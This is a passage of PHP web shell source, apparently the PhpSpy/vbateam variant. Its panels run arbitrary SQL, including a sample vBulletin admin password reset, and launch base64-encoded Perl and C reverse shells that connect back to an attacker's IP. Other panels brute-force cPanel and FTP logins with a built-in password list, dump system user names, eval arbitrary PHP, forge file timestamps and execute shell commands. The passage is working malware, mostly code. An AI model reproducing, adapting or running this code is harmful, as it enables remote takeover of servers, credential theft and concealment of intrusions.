742} elseif ($action == 'sqladmin') {
743 !$dbhost && $dbhost = 'localhost';
744 !$dbuser && $dbuser = 'root';
745 !$dbport && $dbport = '3306';
746 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
747 if (isset($dbhost)) {
748 $dbform.= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
749 }
750 if (isset($dbuser)) {
751 $dbform.= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
752 }
753 if (isset($dbpass)) {
754 $dbform.= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
755 }
756 if (isset($dbport)) {
757 $dbform.= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
758 }
759 if (isset($dbname)) {
760 $dbform.= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
761 }
762 if (isset($charset)) {
763 $dbform.= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
764 }
765 if ($doing == 'backupmysql' && $saveasfile) {
766 if (!$table) {
767 m('Please choose the table');
768 } else {
769 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
770 $table = array_flip($table);
771 $fp = @fopen($path, 'w');
772 if ($fp) {
773 $result = q('SHOW tables');
774 if (!$result) p('<h2>' . mysql_error() . '</h2>');
775 $mysqldata = '';
776 while ($currow = mysql_fetch_array($result)) {
777 if (isset($table[$currow[0]])) {
778 sqldumptable($currow[0], $fp);
779 }
780 }
781 fclose($fp);
782 $fileurl = str_replace(SA_ROOT, '', $path);
783 m('Database has success backup to <a href="' . $fileurl . '" target="_blank">' . $path . '</a>');
784 mysql_close();
785 } else {
786 m('Backup failed');
787 }
788 }
789 }
790 if ($insert && $insertsql) {
791 $keystr = $valstr = $tmp = '';
792 foreach ($insertsql as $key => $val) {
793 if ($val) {
794 $keystr.= $tmp . $key;
795 $valstr.= $tmp . "'" . addslashes($val) . "'";
796 $tmp = ',';
797 }
798 }
799 if ($keystr && $valstr) {
800 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
801 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
802 }
803 }
804 if ($update && $insertsql && $base64) {
805 $valstr = $tmp = '';
806 foreach ($insertsql as $key => $val) {
807 $valstr.= $tmp . $key . "='" . addslashes($val) . "'";
808 $tmp = ',';
809 }
810 if ($valstr) {
811 $where = base64_decode($base64);
812 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
813 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
814 }
815 }
816 if ($doing == 'del' && $base64) {
817 $where = base64_decode($base64);
818 $delete_sql = "DELETE FROM $tablename WHERE $where";
819 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
820 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
821 }
822 if ($tablename && $doing == 'drop') {
823 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
824 if (q("DROP TABLE $tablename")) {
825 m('Drop table of success');
826 $tablename = '';
827 } else {
828 m(mysql_error());
829 }
830 }
831 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
832 formhead(array('title' => 'MYSQL Manager'));
833 makehide('action', 'sqladmin');
834 p('<p>');
835 p('DBHost:');
836 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
837 p(':');
838 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
839 p('DBUser:');
840 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
841 p('DBPass:');
842 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
843 p('DBCharset:');
844 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
845 makeinput(array('name' => 'connect', 'value' => 'Connect', 'type' => 'submit', 'class' => 'bt'));
846 p('</p>');
847 formfoot();
848?>
849<script type="text/javascript">
850function editrecord(action, base64, tablename){
851 if (action == 'del') {
852 if (!confirm('Is or isn\'t deletion record?')) return;
853 }
854 $('recordlist').doing.value=action;
855 $('recordlist').base64.value=base64;
856 $('recordlist').tablename.value=tablename;
857 $('recordlist').submit();
858}
859function moddbname(dbname) {
860 if(!dbname) return;
861 $('setdbname').dbname.value=dbname;
862 $('setdbname').submit();
863}
864function settable(tablename,doing,page) {
865 if(!tablename) return;
866 if (doing) {
867 $('settable').doing.value=doing;
868 }
869 if (page) {
870 $('settable').page.value=page;
871 }
872 $('settable').tablename.value=tablename;
873 $('settable').submit();
874}
875</script>
876<?php
877 // SQL
878 formhead(array('name' => 'recordlist'));
879 makehide('doing');
880 makehide('action', 'sqladmin');
881 makehide('base64');
882 makehide('tablename');
883 p($dbform);
884 formfoot();
885 // Data
886 formhead(array('name' => 'setdbname'));
887 makehide('action', 'sqladmin');
888 p($dbform);
889 if (!$dbname) {
890 makehide('dbname');
891 }
892 formfoot();
893 formhead(array('name' => 'settable'));
894 makehide('action', 'sqladmin');
895 p($dbform);
896 makehide('tablename');
897 makehide('page', $page);
898 makehide('doing');
899 formfoot();
900 $cachetables = array();
901 $pagenum = 30;
902 $page = intval($page);
903 if ($page) {
904 $start_limit = ($page - 1) * $pagenum;
905 } else {
906 $start_limit = 0;
907 $page = 1;
908 }
909 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
910 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
911 // get mysql server
912 $mysqlver = mysql_get_server_info();
913 p('<p>MySQL ' . $mysqlver . ' running in ' . $dbhost . ' as ' . $dbuser . '@' . $dbhost . '</p>');
914 $highver = $mysqlver > '4.1' ? 1 : 0;
915 // Show database
916 $query = q("SHOW DATABASES");
917 $dbs = array();
918 $dbs[] = '-- Select a database --';
919 while ($db = mysql_fetch_array($query)) {
920 $dbs[$db['Database']] = $db['Database'];
921 }
922 makeselect(array('title' => 'Please select a database:', 'name' => 'db[]', 'option' => $dbs, 'selected' => $dbname, 'onchange' => 'moddbname(this.options[this.selectedIndex].value)', 'newline' => 1));
923 $tabledb = array();
924 if ($dbname) {
925 p('<p>');
926 p('Current dababase: <a href="javascript:moddbname(\'' . $dbname . '\');">' . $dbname . '</a>');
927 if ($tablename) {
928 p(' | Current Table: <a href="javascript:settable(\'' . $tablename . '\');">' . $tablename . '</a> [ <a href="javascript:settable(\'' . $tablename . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $tablename . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $tablename . '\', \'drop\');">Drop</a> ]');
929 }
930 p('</p>');
931 mysql_select_db($dbname);
932 $getnumsql = '';
933 $runquery = 0;
934 if ($sql_query) {
935 $runquery = 1;
936 }
937 $allowedit = 0;
938 if ($tablename && !$sql_query) {
939 $sql_query = "SELECT * FROM $tablename";
940 $getnumsql = $sql_query;
941 $sql_query = $sql_query . " LIMIT $start_limit, $pagenum";
942 $allowedit = 1;
943 }
944 p('<form action="' . $self . '" method="POST">');
945 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>' . $dbname . '</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
946 </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">' . htmlspecialchars($sql_query, ENT_QUOTES) . '</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
947 makehide('tablename', $tablename);
948 makehide('action', 'sqladmin');
949 p($dbform);
950 p('</form>');
951 if ($tablename || ($runquery && $sql_query)) {
952 if ($doing == 'structure') {
953 $result = q("SHOW COLUMNS FROM $tablename");
954 $rowdb = array();
955 while ($row = mysql_fetch_array($result)) {
956 $rowdb[] = $row;
957 }
958 p('<table border="0" cellpadding="3" cellspacing="0">');
959 p('<tr class="head">');
960 p('<td>Field</td>');
961 p('<td>Type</td>');
962 p('<td>Null</td>');
963 p('<td>Key</td>');
964 p('<td>Default</td>');
965 p('<td>Extra</td>');
966 p('</tr>');
967 foreach ($rowdb as $row) {
968 $thisbg = bg();
969 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
970 p('<td>' . $row['Field'] . '</td>');
971 p('<td>' . $row['Type'] . '</td>');
972 p('<td>' . $row['Null'] . ' </td>');
973 p('<td>' . $row['Key'] . ' </td>');
974 p('<td>' . $row['Default'] . ' </td>');
975 p('<td>' . $row['Extra'] . ' </td>');
976 p('</tr>');
977 }
978 tbfoot();
979 } elseif ($doing == 'insert' || $doing == 'edit') {
980 $result = q('SHOW COLUMNS FROM ' . $tablename);
981 while ($row = mysql_fetch_array($result)) {
982 $rowdb[] = $row;
983 }
984 $rs = array();
985 if ($doing == 'insert') {
986 p('<h2>Insert new line in ' . $tablename . ' table »</h2>');
987 } else {
988 p('<h2>Update record in ' . $tablename . ' table »</h2>');
989 $where = base64_decode($base64);
990 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
991 $rs = mysql_fetch_array($result);
992 }
993 p('<form method="post" action="' . $self . '">');
994 p($dbform);
995 makehide('action', 'sqladmin');
996 makehide('tablename', $tablename);
997 p('<table border="0" cellpadding="3" cellspacing="0">');
998 foreach ($rowdb as $row) {
999 if ($rs[$row['Field']]) {
1000 $value = htmlspecialchars($rs[$row['Field']]);
1001 } else {
1002 $value = '';
1003 }
1004 $thisbg = bg();
1005 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1006 p('<td><b>' . $row['Field'] . '</b><br />' . $row['Type'] . '</td><td><textarea class="area" name="insertsql[' . $row['Field'] . ']" style="width:500px;height:60px;overflow:auto;">' . $value . '</textarea></td></tr>');
1007 }
1008 if ($doing == 'insert') {
1009 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1010 } else {
1011 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1012 makehide('base64', $base64);
1013 }
1014 p('</table></form>');
1015 } else {
1016 $querys = @explode(';', $sql_query);
1017 foreach ($querys as $num => $query) {
1018 if ($query) {
1019 p("<p><b>Query#{$num} : " . htmlspecialchars($query, ENT_QUOTES) . "</b></p>");
1020 switch (qy($query)) {
1021 case 0:
1022 p('<h2>Error : ' . mysql_error() . '</h2>');
1023 break;
1024 case 1:
1025 if (strtolower(substr($query, 0, 13)) == 'select * from') {
1026 $allowedit = 1;
1027 }
1028 if ($getnumsql) {
1029 $tatol = mysql_num_rows(q($getnumsql));
1030 $multipage = multi($tatol, $pagenum, $page, $tablename);
1031 }
1032 if (!$tablename) {
1033 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1034 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1035 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i", $sql_line, $matches);
1036 $tablename = $matches[1][0];
1037 }
1038 $result = q($query);
1039 p($multipage);
1040 p('<table border="0" cellpadding="3" cellspacing="0">');
1041 p('<tr class="head">');
1042 if ($allowedit) p('<td>Action</td>');
1043 $fieldnum = @mysql_num_fields($result);
1044 for ($i = 0;$i < $fieldnum;$i++) {
1045 $name = @mysql_field_name($result, $i);
1046 $type = @mysql_field_type($result, $i);
1047 $len = @mysql_field_len($result, $i);
1048 p("<td nowrap>$name<br><span>$type($len)</span></td>");
1049 }
1050 p('</tr>');
1051 while ($mn = @mysql_fetch_assoc($result)) {
1052 $thisbg = bg();
1053 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1054 $where = $tmp = $b1 = '';
1055 foreach ($mn as $key => $inside) {
1056 if ($inside) {
1057 $where.= $tmp . $key . "='" . addslashes($inside) . "'";
1058 $tmp = ' AND ';
1059 }
1060 $b1.= '<td nowrap>' . html_clean($inside) . ' </td>';
1061 }
1062 $where = base64_encode($where);
1063 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \'' . $where . '\', \'' . $tablename . '\');">Edit</a> | <a href="javascript:editrecord(\'del\', \'' . $where . '\', \'' . $tablename . '\');">Del</a></td>');
1064 p($b1);
1065 p('</tr>');
1066 unset($b1);
1067 }
1068 tbfoot();
1069 p($multipage);
1070 break;
1071 case 2:
1072 $ar = mysql_affected_rows();
1073 p('<h2>affected rows : <b>' . $ar . '</b></h2>');
1074 break;
1075 }
1076 }
1077 }
1078 }
1079 } else {
1080 $query = q("SHOW TABLE STATUS");
1081 $table_num = $table_rows = $data_size = 0;
1082 $tabledb = array();
1083 while ($table = mysql_fetch_array($query)) {
1084 $data_size = $data_size + $table['Data_length'];
1085 $table_rows = $table_rows + $table['Rows'];
1086 $table['Data_length'] = sizecount($table['Data_length']);
1087 $table_num++;
1088 $tabledb[] = $table;
1089 }
1090 $data_size = sizecount($data_size);
1091 unset($table);
1092 p('<table border="0" cellpadding="0" cellspacing="0">');
1093 p('<form action="' . $self . '" method="POST">');
1094 makehide('action', 'sqladmin');
1095 p($dbform);
1096 p('<tr class="head">');
1097 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1098 p('<td>Name</td>');
1099 p('<td>Rows</td>');
1100 p('<td>Data_length</td>');
1101 p('<td>Create_time</td>');
1102 p('<td>Update_time</td>');
1103 if ($highver) {
1104 p('<td>Engine</td>');
1105 p('<td>Collation</td>');
1106 }
1107 p('</tr>');
1108 foreach ($tabledb as $key => $table) {
1109 $thisbg = bg();
1110 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1111 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="' . $table['Name'] . '" /></td>');
1112 p('<td><a href="javascript:settable(\'' . $table['Name'] . '\');">' . $table['Name'] . '</a> [ <a href="javascript:settable(\'' . $table['Name'] . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'drop\');">Drop</a> ]</td>');
1113 p('<td>' . $table['Rows'] . '</td>');
1114 p('<td>' . $table['Data_length'] . '</td>');
1115 p('<td>' . $table['Create_time'] . '</td>');
1116 p('<td>' . $table['Update_time'] . '</td>');
1117 if ($highver) {
1118 p('<td>' . $table['Engine'] . '</td>');
1119 p('<td>' . $table['Collation'] . '</td>');
1120 }
1121 p('</tr>');
1122 }
1123 p('<tr class=fout>');
1124 p('<td> </td>');
1125 p('<td>Total tables: ' . $table_num . '</td>');
1126 p('<td>' . $table_rows . '</td>');
1127 p('<td>' . $data_size . '</td>');
1128 p('<td colspan="' . ($highver ? 4 : 2) . '"> </td>');
1129 p('</tr>');
1130 p("<tr class=\"fout\"><td colspan=\"" . ($highver ? 8 : 6) . "\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"" . SA_ROOT . $_SERVER['HTTP_HOST'] . "_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1131 makehide('doing', 'backupmysql');
1132 formfoot();
1133 p("</table>");
1134 fr($query);
1135 }
1136 }
1137 }
1138 tbfoot();
1139 @mysql_close();
1140} //end sql backup
1141elseif ($action == 'backconnect') {
1142 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1143 !$yourport && $yourport = '12345';
1144 $usedb = array('perl' => 'perl', 'c' => 'c');
1145 $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1146 $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1147 if ($start && $yourip && $yourport && $use) {
1148 if ($use == 'perl') {
1149 cf('/tmp/angel_bc', $back_connect);
1150 $res = execute(which('perl') . " /tmp/angel_bc $yourip $yourport &");
1151 } else {
1152 cf('/tmp/angel_bc.c', $back_connect_c);
1153 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1154 @unlink('/tmp/angel_bc.c');
1155 $res = execute("/tmp/angel_bc $yourip $yourport &");
1156 }
1157 m("Now script try connect to $yourip port $yourport ...");
1158 }
1159 formhead(array('title' => 'Back Connect'));
1160 makehide('action', 'backconnect');
1161 p('<p>');
1162 p('Your IP:');
1163 makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip));
1164 p('Your Port:');
1165 makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
1166 p('Use:');
1167 makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
1168 makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
1169 p('</p>');
1170 formfoot();
1171} //end backconnect window via NC
1172// Brute
1173elseif ($action == 'brute') {
1174 formhead(array('title' => 'Brute Forcer'));
1175 makehide('action', 'brute');
1176 makehide('dir', $brute);
1177 @ini_set('memory_limit', 1000000000000);
1178 $connect_timeout = 5;
1179 @set_time_limit(0);
1180 $submit = $_REQUEST['submit'];
1181 $users = $_REQUEST['users'];
1182 $pass = $_REQUEST['passwords'];
1183 $target = $_REQUEST['target'];
1184 $option = $_REQUEST['option'];
1185 $passlist = "0123456
118601234567
1187012345678
11880123456789
118901234567890
1190123456
11911234567
119212345678
1193123456789
11941234567890
1195111111
1196000000
1197222222
1198333333
1199444444
1200555555
1201666666
1202777777
1203888888
1204999999
1205123123
1206456456
1207789789
1208123321
1209456654
1210654321
12117654321
121287654321
1213987654321
12140987654321
1215admin
1216administrator
1217admincp
1218cpanel
1219adminx
1220admins
1221password
1222passwords
1223passw0rd
1224p@ssw0rd
1225p@ssword
1226khongco
122725251325
1228passw0rds";
1229 if ($target == '') {
1230 $target = 'localhost';
1231 }
1232 print " <div align='center'>
1233<form method='post' style='border: 1px solid #000000'><br><br>
1234<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1235<b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1236<div align='center'><br>
1237<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1238<tr>
1239<td align='center'>
1240<b>Username</b></td>
1241<td>
1242<p align='center'>
1243<b>Password</b></td>
1244</tr>
1245</table>
1246<p align='center'>
1247<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1248 $i = 0;
1249 while ($i < 60000) {
1250 $line = posix_getpwuid($i);
1251 if (!empty($line)) {
1252 while (list($key, $vba_etcpwd) = each($line)) {
1253 echo "" . $vba_etcpwd . "\n";
1254 break;
1255 }
1256 }
1257 $i++;
1258 }
1259 echo "
1260</textarea>
1261<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1262<br>
1263<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1264<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1265</td></tr></table></td></tr></form><p align= 'left'>";
1266?>
1267<?php
1268 function ftp_check($host, $user, $pass, $timeout) {
1269 $ch = curl_init();
1270 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1271 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1272 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1273 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1274 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1275 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1276 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1277 $data = curl_exec($ch);
1278 if (curl_errno($ch) == 28) {
1279 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1280 exit;
1281 } elseif (curl_errno($ch) == 0) {
1282 p("<b>[ attack@vbateam.net ]# </b>
1283<b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1284 }
1285 curl_close($ch);
1286 }
1287 function cpanel_check($host, $user, $pass, $timeout) {
1288 $ch = curl_init();
1289 curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1290 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1291 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1292 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1293 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1294 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1295 $data = curl_exec($ch);
1296 if (curl_errno($ch) == 28) {
1297 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1298 exit;
1299 } elseif (curl_errno($ch) == 0) {
1300 p("<b>[ attack@vbateam.net ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");
1301 }
1302 curl_close($ch);
1303 }
1304 if (isset($submit) && !empty($submit)) {
1305 $userlist = explode("\n", $users);
1306 $passlist = explode("\n", $pass);
1307 p('<b>[ attack@vbateam.net ]# Attacking ...</font></b><br>');
1308 foreach ($userlist as $user) {
1309 $_user = trim($user);
1310 foreach ($passlist as $password) {
1311 $_pass = trim($password);
1312 if ($option == "ftp") {
1313 ftp_check($target, $_user, $_pass, $connect_timeout);
1314 }
1315 if ($option == "cpanel") {
1316 cpanel_check($target, $_user, $_pass, $connect_timeout);
1317 }
1318 }
1319 }
1320 }
1321 formfoot();
1322} elseif ($action == 'etcpwd') {
1323 formhead(array('title' => 'Get /etc/passwd'));
1324 makehide('action', 'etcpwd');
1325 makehide('dir', $nowpath);
1326 $i = 0;
1327 echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1328 while ($i < 60000) {
1329 $line = posix_getpwuid($i);
1330 if (!empty($line)) {
1331 while (list($key, $vba_etcpwd) = each($line)) {
1332 echo "" . $vba_etcpwd . "\n";
1333 break;
1334 }
1335 }
1336 $i++;
1337 }
1338 echo "</textarea></p>";
1339 formfoot();
1340} elseif ($action == 'eval') {
1341 $phpcode = trim($phpcode);
1342 if ($phpcode) {
1343 if (!preg_match('#<\?#si', $phpcode)) {
1344 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1345 }
1346 eval("?" . ">$phpcode<?");
1347 }
1348 formhead(array('title' => 'Eval PHP Code'));
1349 makehide('action', 'eval');
1350 maketext(array('title' => 'PHP Code', 'name' => 'phpcode', 'value' => $phpcode));
1351 p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
1352 formfooter();
1353} //end eval
1354elseif ($action == 'editfile') {
1355 if (file_exists($opfile)) {
1356 $fp = @fopen($opfile, 'r');
1357 $contents = @fread($fp, filesize($opfile));
1358 @fclose($fp);
1359 $contents = htmlspecialchars($contents);
1360 }
1361 formhead(array('title' => 'Create / Edit File'));
1362 makehide('action', 'file');
1363 makehide('dir', $nowpath);
1364 makeinput(array('title' => 'Current File (import new file name and new file)', 'name' => 'editfilename', 'value' => $opfile, 'newline' => 1));
1365 maketext(array('title' => 'File Content', 'name' => 'filecontent', 'value' => $contents));
1366 formfooter();
1367} //end editfile
1368elseif ($action == 'newtime') {
1369 $opfilemtime = @filemtime($opfile);
1370 //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1371 $cachemonth = array('January' => 1, 'February' => 2, 'March' => 3, 'April' => 4, 'May' => 5, 'June' => 6, 'July' => 7, 'August' => 8, 'September' => 9, 'October' => 10, 'November' => 11, 'December' => 12);
1372 formhead(array('title' => 'Clone file was last modified time'));
1373 makehide('action', 'file');
1374 makehide('dir', $nowpath);
1375 makeinput(array('title' => 'Alter file', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1376 makeinput(array('title' => 'Reference file (fullpath)', 'name' => 'tarfile', 'size' => 120, 'newline' => 1));
1377 formfooter();
1378 formhead(array('title' => 'Set last modified'));
1379 makehide('action', 'file');
1380 makehide('dir', $nowpath);
1381 makeinput(array('title' => 'Current file (fullpath)', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1382 p('<p>Instead »');
1383 p('year:');
1384 makeinput(array('name' => 'year', 'value' => date('Y', $opfilemtime), 'size' => 4));
1385 p('month:');
1386 makeinput(array('name' => 'month', 'value' => date('m', $opfilemtime), 'size' => 2));
1387 p('day:');
1388 makeinput(array('name' => 'day', 'value' => date('d', $opfilemtime), 'size' => 2));
1389 p('hour:');
1390 makeinput(array('name' => 'hour', 'value' => date('H', $opfilemtime), 'size' => 2));
1391 p('minute:');
1392 makeinput(array('name' => 'minute', 'value' => date('i', $opfilemtime), 'size' => 2));
1393 p('second:');
1394 makeinput(array('name' => 'second', 'value' => date('s', $opfilemtime), 'size' => 2));
1395 p('</p>');
1396 formfooter();
1397} //end newtime
1398elseif ($action == 'shell') {
1399 if (IS_WIN && IS_COM) {
1400 if ($program && $parameter) {
1401 $shell = new COM('Shell.Application');
1402 $a = $shell->ShellExecute($program, $parameter);
1403 m('Program run has ' . (!$a ? 'success' : 'fail'));
1404 }
1405 !$program && $program = 'c:\windows\system32\cmd.exe';
1406 !$parameter && $parameter = '/c net start > ' . SA_ROOT . 'log.txt';
1407 formhead(array('title' => 'Execute Program'));
1408 makehide('action', 'shell');
1409 makeinput(array('title' => 'Program', 'name' => 'program', 'value' => $program, 'newline' => 1));
1410 p('<p>');
1411 makeinput(array('title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter));
1412 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1413 p('</p>');
1414 formfoot();
1415 }
1416 formhead(array('title' => 'Execute Command'));
1417 makehide('action', 'shell');
1418 if (IS_WIN && IS_COM) {
